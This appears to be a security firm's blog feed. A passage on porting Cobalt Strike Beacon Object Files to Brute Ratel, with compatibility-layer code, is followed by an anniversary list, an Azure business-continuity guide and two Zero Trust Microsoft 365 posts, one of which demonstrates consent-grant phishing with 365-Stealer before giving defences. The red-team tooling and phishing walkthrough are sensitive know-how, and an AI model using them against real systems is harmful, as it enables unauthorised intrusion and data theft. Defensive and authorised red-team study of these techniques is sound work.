Now that we know how BRC4’s and CS’s BOF APIs are different from each other, we can work out a solution. Well, I’d love to tell you that that was the approach I took: read up on the problem’s intricacies first and then work out a well-structured and thought out solution. Things went a little different though, and I’d like to show you.

Approach 1: The naïve way

My first approach at porting BOFs from CS to BRC4 was based on the BRC4 documentation and involved only three steps:

  • Replace the go(char*, int) entrypoint with coffee(char**, int, WCHAR**).
  • Remove CS API imports (“beacon.h”) and add BRC4 API imports (“badger_exports.h”).
  • Replace uses of CS APIs with BRC4 APIs.

That looks easy to do! So let’s test this using the DsGetDcNameA example they posted in the documentation:


Nice, that worked very well! How about a real world example of an open source BOF: Outflank’s Winver BOF grabs the exact windows version of the victim machine. Again we replace the entrypoint, API imports and API uses:

#include "badger_exports.h"


VOID coffee(char** Args, int len, WCHAR** dispatch) {
	// snip
	dwUBR = ReadUBRFromRegistry();
	if (dwUBR != 0) {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u.%u\n", chOSMajorMinor, pPEB->OSBuildNumber, dwUBR);
	else {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u\n", chOSMajorMinor, pPEB->OSBuildNumber);
Common output with BOFs: not much to work with!

Running this gives us… nothing! This is a problem you’ll encounter when working with BOFs: you won’t receive any feedback when they aren’t executed or crash, making debugging and identifying the root cause just a bit harder.

But what was the problem in this case? Well, I got stuck for a bit at this point and after digging into the compiled BOF I noticed that there were WinAPI calls in the code that were not explicitly declared as imports:

DWORD ReadUBRFromRegistry() {
	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");

Cobalt Strike’s BOF documentation says that “GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are available within BOF files” and don’t need to be explicitly imported by BOFs. This doesn’t apply to BRC4 though so imports for those need to be added:


#ifdef GetProcAddress
#undef GetProcAddress
#define GetProcAddress KERNEL32$GetProcAddress
#ifdef GetModuleHandleA
#undef GetModuleHandleA
#define GetModuleHandleA KERNEL32$GetModuleHandleA
#ifdef GetModuleHandleW
#undef GetModuleHandleW
#define GetModuleHandleW KERNEL32$GetModuleHandleW
#ifdef LoadLibraryA
#undef LoadLibraryA
#define LoadLibraryA KERNEL32$LoadLibraryA
#ifdef LoadLibraryW
#undef LoadLibraryW
#define LoadLibraryW KERNEL32$LoadLibraryW
#ifdef FreeLibrary
#undef FreeLibrary
#define FreeLibrary KERNEL32$FreeLibrary

Note that the macros allow us to leave the original function calls in the BOF untouched. If we didn’t do that, we would need to prepend KERNEL32$ to every call of the functions listed above.

After adding those and recompiling, we can run the BOF again and now it runs just fine:

Running a CS BOF in BRC4 after adding default imports

That’s great! However this approach is pretty limited. Let’s have a look at some of its shortcomings.


The naïve approach works great for very simple BOFs that don’t use any of CS’s higher-level APIs. Many of the advanced BOFs use some of those APIs though.

Let’s examine TrustedSec’s sc_enum as it’s a very useful BOF and great example: it allows an operator to enumerate Windows services on a target machine. If we were to perform our simple 3-step approach again we’d hit a roadblock:

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
	const char * hostname = NULL;
	const char * servicename = NULL;
	datap parser;
	BeaconDataParse(&parser, Buffer, Length);
	hostname = BeaconDataExtract(&parser, NULL);

You can see that this BOF takes the hostname parameter from the “Data Parser API” (BeaconDataExtract) that isn’t present in BRC4. There’s no equivalent to this API in BRC4.

At this point I figured that instead of coming up with some hacky fix I’d work out a proper solution that works more reliably and is more flexible: after all, I didn’t want to manually edit all the BOFs I use on a regular basis and troubleshoot API replacements.

Approach 2: True Compatibility

Since replacing APIs was already tricky in some cases and just impossible for higher-level APIs, I was searching for a solution that allowed me to (ideally) not touch any API calls in BOFs’ source code at all. There are two challenges to solve: allowing BOFs to call CS APIs and transforming their entrypoint to BRC4’s signature.

Compatibility Layer

Luckily, I wasn’t the first one to attempt this: TrustedSec’s COFFLoader is able to execute arbitrary compiled CS BOFs which means that it treats BOFs as blackboxes and introduces a compatibility layer that implements the CS BOF API. With this approach in mind I modelled the following design:

The compatibility layer

The idea is simple:

The CS API definitions included in BOF source code, usually called beacon.h, are replaced with stubs that don’t import the actual API but use the compatibility layer code. The compatibility layer imports the BRC4 BOF API and calls it as needed. COFFLoader’s compatibility layer is very readable and straight-forward to understand. It implements all the higher-level concepts missing in the BRC4 API. One only needs to copy their implementation and swap out some bits that require imports, such as string or memory utilities. They should be replaced with BRC4’s equivalents (e.g. replacing memcpy with BadgerMemcpy) or, less ideally, with MSVCRT imports (e.g. vsnprintf for string formatting). For example, the BeaconFormatAlloc API can be implemented as follows:

void BeaconFormatAlloc(formatp* format, int maxsz) {
	if (format == NULL) return;
	format->original = (char*)BadgerAlloc(maxsz);
	format->buffer = format->original;
	format->length = 0;
	format->size = maxsz;

For the sake of completeness: the compatibility layer should also include imports to the WinAPI functions included by default in CS (GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary).

As a result, following this approach won’t tamper with the BOFs’ original logic but lets us implement the CS API ourselves, which in turn allows our BOFs to run in BRC4 now. Well, almost: the entrypoint isn’t compatible yet, and that’s not necessarily trivial.

Wrapping the Entrypoint

As we saw in the first attempt, porting the entrypoint from CS to BRC4 BOFs isn’t really tricky as we only need to change the function signature. It does get tricky if our BOF uses its start parameters (and thereby CS’s Data Parser API) though:

This API allows passing arbitrary data to CS BOFs. To achieve this, CS BOFs can ship with CNA scripts that allow the CS client to query input data (such as files) from operators, which the CNA assembles into a binary blob. This blob is sent along with the BOF itself to the implant (“beacon”). The BeaconData* APIs (which make up the Data Parser API) allow BOFs to disassemble this blob into structured data again. BRC4 doesn’t have this scripting capability and its BOF entrypoint only allows passing string-based arguments instead.

Again, COFFLoader solved the same problem before: it comes with a Python script that encodes arbitrary input into a hex-string that can be deserialized to a byte-buffer and passed to CS BOF entrypoints. Following the same approach, I worked out the following rather simple addition to the design above:

Wrapped entrypoint

Once more, the idea is simple:

Operators encode their inputs to string and pass it to the BOF using BRC4’s coffexec command. A minimal BRC4 entrypoint is appended to the BOF source code. This entrypoint decodes supplied input strings to a buffer and passes that buffer to the original CS entrypoint.


In essence, this approach consists of only three steps:

  1. Replace CS API imports with compatibility layer implementations
  2. Wrap CS entrypoint with a custom BRC4 entrypoint that prepares input for the Data parser API
  3. Manually encode execution parameters

This still isn’t a perfect solution but leaves us with a couple of pros and cons:

  • ✅ Doesn’t touch the original BOF’s logic
  • ✅ Flexibility: the same approach works for most (if not all) BOFs out there
  • ❌ Requires (somewhat) elaborate compatibility implementation
  • ❌ Requires some way to inject the compatibility layer (e.g. via source code)

III. Coming up next

Now that we have a solid and flexible approach to run CS BOFs on BRC4, there’s only one thing missing – a tool that automates it all!

We will publish CS2BR – a tool that does just that – as an open source project on Github along with a follow-up blogpost all about it soon. Stay tuned!

Moritz Thomas

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

We’re celebrating our 10th anniversary!

From 5 people to almost 250 people. From working from our founders’ apartment to five offices in four countries. From an unknown challenger to being a reference in multiple fields in cyber security.

As a company, NVISO has come a long way since 2013 and we want to take a moment to celebrate what we have accomplished together so far.

NVISO celebrates a decade of European cyber security expertise

In 2013, NVISO was founded by five young security professionals with a dream:
To build a home and a hub for cyber security experts, here in the heart of Europe.

  • A team built on strong values.
  • A place that prioritizes personal growth and encourages everyone to innovate.
  • A community of experts that strives to be the best at what they do.
  • All working towards the mission of protecting European society from potentially devastating cyber attacks.

Together, we made it a reality!

This would not have been possible without the trust of our clients & partners and, most crucially, the dedication of every single NVISO bird. Thank you all!

Over the past decade, our team has made significant contributions to the field of cybersecurity through research and innovative solutions.

So, let’s take a trip down memory lane and revisit ten of the most influential articles from our blog!

  1. ApkScan
    Back in 2013, our first research project was a scanner for APKs; that Android malware analysis tool was very successful, being cited in academic papers, and helped us rapidly build knowledge and experience with what was then a relatively new challenge, mobile security. (Read more)
  1. Intercept Flutter traffic on iOS and Android
    Mobile security remains one of our big focus points, and this blogpost offers practical guidance for other testers on how to bypass SSL pinning, intercept HTTPS traffic, and use ProxyDroid during their mobile security assessments. (Read more)
  1. My journey reaching #1 on Hack The Box Belgium – 10 tips, tricks and lessons learned
    Inspiring others by sharing a personal success story – in this case, reaching the #1 spot on Hack The Box Belgium – is something we really encourage our colleagues to do. Combining hands-on tips with a few motivational memes mixed was the recipe for this popular & often-shared blog post! (Read more)

  2. Painless Cuckoo Sandbox Installation
    Sharing hands-on practical tutorials on how to solve a certain problem we had to deal with ourselves, has proven to be a good source for blog posts: practical tutorials where we share source code are some of the most searched blog posts we publish. This particular blog post explains how to set up a Cuckoo sandbox for analyzing malware samples, which is useful for blue team members who need to analyze a suspected malware sample without submitting it to online malware analysis services that may alert adversaries. (Read more)
  1. A practical guide to RFID badge copying
    Deciding which information (not) to publish is always an important balancing act: on one hand, we want to share important information about vulnerabilities as much as possible, while also protecting potential victims without encouraging illicit use of the information. We decide to share this particular blog post to raise awareness about the potential security risks associated with RFID card reading systems, which are often the sole factor of security that prevents unauthorized access to buildings, server rooms, and offices. The post demonstrates how easy it is to clone and abuse RFID cards using specialized hardware, such as the Proxmark3, when the card reader security mechanism is insufficiently secured. (Read more)

  2. DeTT&CT: Mapping detection to MITRE ATT&CK 
    Detailed and hands-on guide on mapping your detection capabilities to MITRE ATT&CK using MITRE DeTT&CT. Using this it becomes easier to build and maintain rules, and spot your blind spots! (Read more)

  3. Another spin to Gamification: how we used to build a (great!) Cyber Security Game
    People are at the heart of cybersecurity. In this blog post, we outline how we crafted an – if we may say so ourselves – fun and informative game using to promote cybersecurity awareness, and tell you how you can too. (Read more)

  4. PowerShell Inside a Certificate? – Part 1
    Didier Stevens outlines in this blog post how we crafted YARA detection rules that don’t just detect things we know are bad, but also checks whether things actually have the format we expect them to. This way we found some PowerShell code hidden in Certificate files. (Read more)

  5. Detecting DDE in MS Office documents
    Didier Stevens shares in this blog post how to detect Dynamic Data Exchange, an old technology often abused to weaponize MS Office documents. We believe sharing tips and detection rules like this one makes us all more secure in the end! (Read more)

  6. Under the hood: Hiding data in JPEG images
    In this lighthearted blog post, we dive under the hood of how you can hide your secrets inside a JPEG file. We recommend using this as a party trick or as a fun challenge, not for your TLP Red stuff! (Read more)

Enforce Zero Trust in Microsoft 365 – Part 2: Protect against external users and applications

Enforce Zero Trust in Microsoft 365 - Part 2: Protect against external users and applications

In the first blog post of this series, we have seen how strong authentication, i.e., Multi-Factor Authentication (MFA), could be enforced for users using a free Azure Active Directory subscription within the Microsoft 365 environment.

In this blog post, we will continue to harden the configuration of our Azure AD tenant to enforce Zero Trust security without any license requirement. Specifically, we will see how our organization can protect against external users and prevent malicious applications from accessing our tenant.

Previous blog post:

Settings hardening

Because some default settings in Azure Active Directory are not secure and might introduce security issues within our organization, I wanted to quickly go over them and see how they could be used by malicious actors.

Guest users

We haven’t discussed guest users for now. It is because access control for guest users can’t be enforced using an Azure AD free license. However, guest users might be the entry door for attackers to access our Microsoft 365 environment. Indeed, by compromising a user in a partner’s environment, adversaries will directly gain access to our environment because of this implicit trust relationship that is automatically setup when inviting guest users. Therefore, we can either assume that guest users are correctly protected in their home tenant (we will see in a later blog post that even if guest users have the appropriate security controls enforced in their home tenant, these security controls might not be enforced in certain circumstances to access our tenant (i.e., the resource tenant)), or restrict or disable guest user invitations. In any case, the way guest users will be managed is an important consideration for our Zero Trust approach. In our case, we will not simply block guest user invites because we think that collaboration with external parties is an important aspect for our business and will be required. Therefore, we want to take a proactive approach to this problem by setting a solid foundation before it is too late.

First, we want to ensure that no one in the organization, except authorized users, can invite guest users. Indeed, by default, all users in our organization, including guest users, can invite other guest users. This could represent a serious weakness in our Zero Trust approach. Therefore, we will only allow users assigned to specific administrator roles to invite guest users (this includes the Global Administrators, User Administrators and Guest Inviters roles).

Guest invite restrictions are configured in Azure AD. For that purpose, go to the Azure Portal > Azure Active Directory > Users > User Settings > Manage external collaboration settings under External users. Choosing the most restrictive option disables the ability to invite guest users.

Guest invite restrictions in Azure AD
Guest invite restrictions

Moreover, because our organization works with defined partners, users should only be able to collaborate with them. We can therefore further restrict invitations by specifying domains in the collaboration restrictions settings:

Collaboration restrictions
Collaboration restrictions

For those restrictions, a reliant process is required to clearly define who can manage guest users and external domains, especially if you regularly collaborate with different partners.

By default, guest users have extensive permissions. If an attacker takes over a guest account, the information to which the guest user has access, may be used for advanced attacks on our company. For this reason, we want to restrict them as much as possible. It might not be required for guest users to be able to enumerate resources in our Azure Active Directory tenant. This could allow adversaries, that compromised a guest user, to gain information on users within our tenant such as viewing our employees for sending (consent) phishing emails to gain initial access or viewing other partners to deceive them by impersonating our company or an employee. Therefore, we want to limit guest users permissions.

Guest user access restrictions in Azure AD
Guest user access restrictions

With these restrictions implemented for guest users, we have already decreased the potential impact that a compromised guest user could have in our environment. However, remember that with the current configuration, specific access controls, such as strong authentication for guest users, are not enforced to access our tenant. This means that a compromised guest user might still be used to access our environment.

External applications

In Azure Active Directory, applications can be integrated into Azure Active Directory to make them accessible to user. There are many types of applications that can be made accessible through Azure AD such as cloud applications, also known as pre-integrated applications, like Office 365, the Azure Portal, Salesforce, etc., custom applications, and on-premises applications.

Users can consent to applications to allow these applications to access organization data or a protected resource in the tenant on their behalf. Indeed, applications can request API permissions so that they can work properly. These API permissions include accessing a user’s profile, a user’s mailbox content, sending emails, etc. This can also be seen as an entry door for adversaries to gain access to information in our environment. For example, attackers could trick an employee by sending a consent link (consent phishing) to an employee for a malicious application. If the user consents, attackers would have the permissions the user has consented to. Even worse, an administrator might consent to an application for the entire organization. This means that a malicious application could potentially gain access to all directory objects.

Let’s abuse it!

If user consent is allowed in our Azure AD tenant, adversaries could send consent grant phishing to employees. Let’s see how this could be done.

First, because adversaries could access our Azure AD tenant because guest invitation restrictions were initially not configured, they could gather a list of our employees as well as their email address. Then, they used this list to create a phishing campaign for a Microsoft Advertising Certification study guide.

Phishing email
Phishing email

Because one employee was very eager to try out this new limited edition guide, they clicked the link and signed in with their credentials.

Application permissions request
Permission consent

Unfortunately, the employee had administrative permission in our tenant and could therefore grant consent on behalf of the entire organization. Everyone should benefit from this free offer, right?… Not really, no. Indeed, as shown in the above screenshot the application, which is not verified, requires a lot of access such as sending and viewing emails, read and write access to mailbox settings, and read access to notes, files, etc.

Once the user clicks, adversaries can retrieve information about the user as well as from the organization. Additionally, they can access the user’s mailbox, OneDrive files and notes.

For this demonstration, I used 365-Stealer from AlteredSecurity to setup the phishing page and to access users in the directory:

Phished users in 365-Stealer

How to protect ourselves against consent grant phishing?

There are no bullet proof solutions to protect users from phishing, unless you disable the ability for users to receive emails and messages globally, which is very far from ideal. Indeed, even with Office 365 threat policies, such as anti-phishing policies, and user awareness, malicious actors are always finding new ways of bypassing these polices and tricking users. However, what we can do is disabling the ability to consent for applications in Azure AD.

To restrict user consent for applications, it is possible to disable or restrict applications and permissions that user can consent to. Unless it is required, it is highly recommended to disable user consent. This will be done for our organization tenant to prevent consent grant attacks.

Consent and permissions for users
Consent and permissions for users

This setting can be configured in Azure Portal > Azure Active Directory > Users > User settings > Manage how end users launch and view their applications under Enterprise applications > Consent and permissions.

Besides blocking this functionality, it is also possible to only allow users to consent for permissions classified as low impact. Microsoft provides the ability to define our own classification model for application permissions, ranging from low to high as show below. In that case, administrators can select the Allow user consent for apps from verified publishers, for selected permissions (Recommended) setting in the user consent settings page:

Permission classifications for applications in Azure AD
Permission classifications for applications in Azure AD


In this blog post, we went over different settings in Azure AD that can be restricted to prevent malicious users from being added to our tenant. Moreover, we have seen how application consent settings can be abused through consent grant phishing and how we can protect against it.

I have selected these settings among others because we usually see that they are not restricted in most environments during our security assessments. However, configuring only these settings is not enough to protect your environment against malicious and unauthorized actions. If you would like to know more about how NVISO can help you securing your environment, feel free to reach out or to check our website.

In the next blog post, we will go over Azure AD Conditional Access policies, see how they can be used to further increase the security posture of our environment and implement our Zero Trust security approach.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Implementing Business Continuity on Azure

There is a general misconception among cloud consumers that the availability of their resources in the cloud is always guaranteed. This is not true since all cloud providers, including Microsoft, offer specific SLAs for their products that almost never reach an availability target of 100%. For the consumers who have deployed critical resources and applications to the cloud, reaching the company-defined targets for Business Continuity can be technically challenging and confusing. The purpose of this blog post is to provide practical guidance on how Business Continuity is expressed on the cloud, how it can be implemented for many Azure IaaS and PaaS services and what real-world problems each solution attempts to solve.


Before we dive into the technical Azure-specific details, let’s explain what Business Continuity is and what it involves.

Business Continuity is the capability of the organization to continue the delivery of products or services at acceptable predefined levels following a disruptive incident. According to ISO 22301, business continuity is not limited only to IT and it involves many enterprise aspects.

In this blog post, we will focus on the business continuity aspects related to IT. Each of them corresponds to a specific type of SLA that you may have internally or with your customers, so there are multiple aspects of Business Continuity that may be applicable to you.

If it’s important for you to keep your services always up and running, you should focus on High Availability. This is the ability of a system to be continuously operational, or, in other words, have an uptime percentage of near 100%. It is generally achieved by implementing redundant, mirrored copies of the hardware and data, so that if one component fails, another one takes over.

If fluctuating demand and bottlenecks cause your systems to struggle, then you may need to focus on Scalability. This is the ability of a system to scale up or scale down cloud resources as needed to meet fluctuating demand. It can be considered as an aspect of Business Continuity, since peaks in demand can be the result or the cause of an incident.

Finally, to protect data that are critical to your company’s functionality and need to be always available and recoverable, you should implement Backup. This is the duplication of data to a secondary location, so that if the primary copy is harmed or becomes unavailable, data from the other location can be retrieved and the system can be rolled back to a specific point in time.

The following diagram shows an analogy between the aforementioned terms and the problems they tackle.

Business Continuity: Mapping of problems and solutions

It is important to note that the implementation of any of the controls described in this blogpost should be based on a structured business continuity assessment/plan, and should be selected based on the requirements of your environment or application. Improvident implementation of controls could result in undue costs or in inefficient protection.

Implementing High Availability

Depending on the required uptime of your application or system and the scale of disaster you need to be able to recover from, there are many ways to implement high availability in Azure. When choosing the controls that will be implemented in your environment, you should always consider that the availability in a chain of resources is determined by the weakest link in the chain. For example, in the case of an application composed by a front-end server and a database, if the web server is spread across multiple availability zones but the database is single-instance, the whole application will not be available anymore if the availability zone of the database goes down. Having the above in mind, we present below the different options provided by Azure, sorted by increasing complexity and costs.

Protection against hardware failures

Small-scale technical or hardware issues may affect single-instance components. To avoid this, the component should be mirrored to a secondary hardware volume. On Azure, depending on your cloud computing state, this can be implemented as follows:


When the component is a Virtual Machine (VM), this can be achieved by using availability sets. An availability set is a logical grouping of VMs that allows Azure to understand how your application is built to provide for redundancy and availability. While for single-instance VMs Azure guarantees a 99,9% uptime SLA, by using availability sets the uptime is increased to 99,95%. To use availability sets on Azure VMs, you need to perform the following steps:

  1. Create an availability set;
  2. Create new VMs; in the creation wizard, under “Availability options” choose “Availability set” and then select the previously created set.

Note: It is not possible to add existing VMs to an availability set after their creation.


Azure PaaS components are protected against local hardware failures by design, guaranteeing higher uptime SLAs than IaaS. Specifically:

  • Storage Accounts: Microsoft ensures 3 instances of the service when using the default redundancy option (Locally redundant Storage – LRS). This offers an SLA of 99.999999999% (11 nines) uptime.
  • SQL Databases: By default, Microsoft ensures at least two instances of the service within the same data center, reaching 99,99% uptime.
  • Cosmos DB: By default, Microsoft provides three replicas (individual nodes) within a cluster, ensuring an SLA of 99,99% uptime.
  • App Service: Microsoft guarantees an SLA of 99.95% uptime for App Services, for tiers other than Free or Shared.

Protection against datacenter failures

To provide the option of protecting against failures that affect the whole datacenter, such as fire, power and cooling disruptions or flood, Microsoft has introduced the concept of availability zones. Availability zones are unique physical locations within an Azure region, each made up of one or more datacenters with independent power, cooling, and networking. The creation of multiple instances of services across two or more zones provides increased high availability, as it protects both against hardware and against datacenter failures.

Azure Availability Zones
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on your Cloud computing model, such protection can be achieved as follows:


Virtual machines can be deployed across multiple availability zones to provide an uptime SLA of 99,99%. This can be done with the following steps:

  1. Create a VM; under “Availability options” select “Availability zone” and specify a zone. This will be the primary zone of your VM.
  2. Open the VM.
  3. Under Operations, select “Disaster recovery” and set the option “Disaster Recovery between Availability Zones?” to “Yes”. Under “Advanced settings” you will be able to see or change the secondary zone.
  4. Click on “Review and start replication”.


When it comes to PaaS services, it is generally easier to deploy them across multiple availability zones. Specifically:

  • Storage Accounts:
    • Microsoft ensures 3 instances of the service across three different availability zones (Zone redundant Storage – ΖRS). This offers an SLA of 99.9999999999% (12 nines) uptime over a given year.
    • The option can be enabled during the Storage Account creation, under Basics – Redundancy.
  • SQL Databases:
    • Zone redundancy available at the General purpose, Hyperscale, Business Critical and Premium Service tiers. The SLA depends on the tier and can reach 99.995% of uptime.
    • The option can be configured during the SQL DB creation, under the Service tier selection menu, or under Settings – Compute + storage for existing databases.
  • Azure Cosmos DB Accounts:
    • Enabling zone redundancy in an Azure Cosmos DB account can increase the uptime SLA to 99.995%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Availability Zones.
  • App Service:
    • Zone redundancy is only available in either Premium v2 or Premium v3 App Service Plans for Web Apps and in Elastic P2 for Function Apps. At the time of writing, Microsoft has not published specific SLAs for zone-redundant App Services, but it guarantees at least three instances of the service.
    • The option can be enabled during the creation of the Service Plan, under Zone redundancy.

Note: It is not possible to enable availability zone support after the creation of any of the above components.

Protection against regional failures

Finally, to protect against regional failures that can affect many adjacent datacenters and can be caused by large-scale natural and man-made disasters (e.g., earthquake, tornados, war), Microsoft has introduced the concept of availability regions. Azure regions are physical regions all over the world, designed to offer protection against local disasters within availability zones and against regional or large geography disasters by making use of another region and replicating the workloads to that region. The secondary region could be considered as the disaster recovery site. Availability regions can be used independently of availability zones or in conjunction with them.

Azure Availability Regions
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on the Cloud computing model of the application components that you want to protect, you have the following options:


Virtual machines can be deployed across multiple availability regions to provide an uptime SLA of 99,99%. This capability is offered by the Azure Site Recovery service that orchestrates the replication, failover, and recovery of the VMs. Site Recovery can be implemented with the following steps:

  1. Open the VM for which you want to configure regional redundancy.
  2. Under Operations, select “Disaster recovery”, set the option “Disaster Recovery between Availability Zones?” to “No” and select a target region.
  3. Click on “Review and start replication”.


PaaS services can be protected from regional disasters as follows:

  • Storage Accounts:
    • With the Geo redundant Storage option (GRS), Microsoft ensures that there are 3 instances of the Storage Account in the primary region and another 3 instances in the secondary region. This offers an SLA of 99.99999999999999% (16 nines) uptime over a given year. There is also the option of Geo-zone-Redundant Storage (GZRS) which spreads the instances of the primary region across 3 different availability zones, to enable fastest recovery times in case of a datacenter failure.
    • The option can be enabled under Data Management – Redundancy for an existing Storage Account.
  • SQL Databases:
    • An additional replica for read operations can be created in a secondary region and used as a disaster recovery site. The SLAs for the geo-redundant setup vary depending on the selected service tier.
    • The option can be configured for a given SQL DB, under the Service tier selection menu.
  • Azure Cosmos DB Accounts:
    • Enabling geo redundancy in an Azure Cosmos DB account can increase the SLA for read operations to 99.999%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Geo-Redundancy, or for an existing Cosmos DB account under Settings – Replicate data globally.
  • App Service:
    • As of the time of writing, there is no geo-redundancy support for Azure App Service.

Before closing with High Availability, remember that a highly available system is a system that your customers and employees can rely on. It increases the credibility of your company, improves its reputation and offers peace of mind to your valuable users. Although costs may go up, depending on your implementation choices, it shall assist you to establish yourself as a trustworthy partner.

Implementing scalability

For systems whose load can abruptly increase or decrease, a problem arises: How can you guarantee the available level of resources during high periods, while at the same time keeping your costs to the minimum during the low periods? This is the essence of scaling, and in the cloud, achieving this balance is much easier than in traditional, on-premises infrastructures. There are two main ways that an application can scale: vertical scaling and horizontal scaling. Vertical scaling (scaling up) increases the capacity of a resource, for example, by increasing the VM size, CPU, memory, etc. Horizontal scaling (scaling out) adds new instances of a resource, such as VMs or database replicas.

Vertical vs horizontal scaling

While vertical scaling can be achieved more easily, and without making any changes to the application, at some point it hits a limit where the system cannot be scaled more. On the other hand, horizontal scaling is more flexible, cheaper, and applies to big, distributed workloads. It also enables autoscaling, which is the process of dynamically allocating resources to ensure performance. That is why, especially in the Cloud, horizontal scaling is the recommended option.

The options Azure provides you with are as follows:


Scalability of Virtual Machines in Azure can be achieved through Virtual Machine Scale Sets (VMSS). These represent groups of load-balanced VMs that provide scalability to applications by automatically increasing or decreasing the number of VM instances in response to demand or a defined schedule. VMSS can be deployed into one Availability Zone, multiple Availability Zones or even regionally.

During the creation of a VMSS resource, the cloud consumer can specify the scalability options and minimum instance number, the Load Balancer (or Application Gateway, in case of HTTPS traffic) that will be used, and other networking and orchestration options.


In most cases, managed PaaS services have horizontal scaling and autoscaling built in. The ease of scaling these services is a major advantage of using Azure PaaS services.

Specifically for App service, we should point out that the scaling options depend on the App Service plan (tier) and can reach a maximum of 100 instances when using the Isolated tier.

Implementing backups

Although HA solves the problem of small or extended failures, what happens if the unavailability of data originates from a malicious threat, such as a ransomware attack? In this case, having a highly available infrastructure will simply replicate the encrypted/corrupted files everywhere almost immediately, leaving no recovery options. Here is where the value of remote data copies, that are unaffected by real-time modifications, lies. With Azure Backup, regular backups and snapshots of workloads are taken, so that in case of unauthorized modification or deletion, the service can be restored to a specific point in time.

Backups in Azure can be implemented both for IaaS and for PaaS services, and the options are presented below.


VM backups can be either locally redundant or zone redundant. Recovery from backups can be implemented in two ways: the standard option generates backups once a day and maintains instant restore snapshots for 2 days. The enhanced option generates multiple backups per day, maintains instant restore snapshots for 7 days and ensures that snapshots are spread across zones for increased resiliency. The second option applies to VMs of high criticality.

In an existing Azure VM, Backups can be configured under Operations – Backup.


Multiple backup options also exist for different PaaS services:

  • Storage Accounts:
    • Azure provides the option to configure operational backups of the blobs of a Storage Account.  This is a local backup solution that maintains data for a specified duration in the source storage account itself. Although a Backup Vault is required to manage the backup, there is no copy of the data stored in the Vault. The backup is continuous and allows the reversion to a specific point in time in case of data corruption.
    • The option can be configured under Data management – Data protection for existing Storage Accounts, by selecting the checkbox “Enable operational backup with Azure Backup” and following the necessary steps presented in the portal.
  • SQL Databases:
    • Azure gives the option of locally redundant, zone-redundant or geo-redundant backups.
    • Configuration can be performed with the option “Backup storage redundancy” under Settings – Compute + storage for existing databases, or under Basics – “Backup storage redundancy” during the database creation.
  • Azure Cosmos DB Accounts:
    • Two options are offered for backup functionality, either periodic (LRS or ZRS or GRS) or continuous backup. When using the periodic backup mode, which is the default one for all accounts, backups are taken at periodic intervals and the data can only be restored by creating a request with Microsoft’s support team. On the contrary, continuous backup facilitates the restoration to any point of time within either 7 or 30 days (depending on the tier) through the portal.
    • Can be configured under “Backup Policy” during creation, or under the “Backup & Restore” pane for existing accounts.
  • App Service:
    • Azure provides the possibility to backup an App’s content, configuration and database by enabling and scheduling periodic backups, which are stored in a Storage Account.
    • Backup and restoration options can be configured under Settings – Backups for existing App Services.

Overall, it is important to find the balance between the frequency of backups and the amount of maintained past snapshots, in order to lose as less data as possible in case of an incident, be able to revert to a healthy past state and at the same time maintain costs to an acceptable level for your company.


To conclude, it all ends up to one question: Can you survive? Can you recover from disasters as small as power interruptions to as big as pandemics and earthquakes? Business Continuity is the key to the answer. And in the modern, distributed Cloud world, all the capabilities are there – it’s just up to you, your dedication and commitment to implement the ones that are essential to your business.

Elpida Rouka

Elpida is an Information Security Consultant, with expertise in Azure/O365 Security, SIEM, Identity & Access management, Risk management, Information Security Management Systems (ISMS) and Business Continuity planning (ISO22301). She is always eager to create innovative high-quality solutions that precisely meet business needs.

Stijn Wellens

Stijn is a manager with experience in cloud and network security. He is Solution Lead for Cloud Security Assessments and Microsoft Cloud Security Engineering at NVISO. Besides the technical challenges during Azure and Microsoft 365 security roadmap implementations, Stijn enjoys coaching the teams by sharing his knowledge and experience.

Enforce Zero Trust in Microsoft 365 – Part 1: Setting the basics

This first blog post is part of a series of blog posts related to the implementation of Zero Trust approach in Microsoft 365. This series will first cover the basics and then deep dive into the different features such as Azure Active Directory (Azure AD) Conditional Access policies, Microsoft Defender for Cloud Apps policies, Information Protection and Microsoft Endpoint Manager, to only cite a few.

In this first part, we will go over the basics that can be implemented in a Microsoft 365 environment to get started with Zero Trust. For the purpose of the blog post, we will assume that our organization decided to migrate to the cloud. We just started investigating what are the quick wins that can be easily implemented, what are the features that will need to be configured to ensure security of identities and data, and what the more advanced features that could be used to meet specific use cases would be.

Of course, the journey to implement Zero Trust is not an easy one. Some important decisions will need to be made to ensure the relevant features are being used and correctly configured according to your business, compliance, and governance requirements without impacting user productivity. Therefore, the goal of this series of blog posts is to introduce you possible approaches to Zero Trust security in Microsoft 365.


However, before starting we need to set the scene by quickly going over some principles.

First, what is a Zero Trust security approach? Well, this security model says that you should never trust anyone and that each request should be verified regardless of where the request originates or what the accessed resource is. In other words, this model will assume that each request comes from an uncontrolled or compromised network. Microsoft provides this nice illustration to represent the primary elements that contribute to Zero Trust in a Microsoft 365 environment:

Zero Trust approach in Microsoft 365
Zero Trust approach in Microsoft 365

We will go over these components as part of this blog post series.

You may wonder why I have decided to discuss Zero Trust in Microsoft 365. Because I think it is one of the most, if not the most, important aspects of a cloud environment. Indeed, with cloud environments, identities are considered as the new perimeter as these identities can be used to access Internet-facing administrative portals and applications from any Internet-connected device. 

Furthermore, even when security controls are enforced, it does not mean that the environment is secure. There were many attacks these past few months/years that allowed attackers to bypass security controls through social engineering, and phishing attacks, for example. Therefore, the goal is more to reduce the potential impact of a security breach on the environment than to prevent attacks from succeeding.

